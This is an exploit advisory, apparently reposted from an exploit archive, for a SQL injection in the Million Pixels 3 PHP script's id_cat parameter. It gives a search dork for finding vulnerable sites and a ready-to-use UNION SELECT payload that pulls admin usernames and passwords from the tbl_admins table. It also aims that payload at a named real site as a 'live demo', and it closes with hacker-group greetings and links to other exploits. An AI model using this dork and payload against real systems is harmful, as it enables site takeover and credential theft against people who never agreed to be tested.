#################################################################

#

# Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

#

#========================================================

# =

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

# =

#========================================================

#

# script : http://e-topbiz.com/oprema/pages/millionpixels3.php

#

# DorK : inurl: "tops_top.php? id_cat ="

#################################################################

Exploit:

www.[target].com/Script/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

L!VE DEMO:

http://e-topbiz.com/trafficdemos/pixel3/tops_top.php?id_cat=-5/**/UNION/**/SELECT/**/1,concat_ws(0x3a,UserName,Password)/**/from/**/tbl_admins/*

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability】相关文章：

★ Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

★ jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

★ Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

★ Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

★ PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

★ IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

★ Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit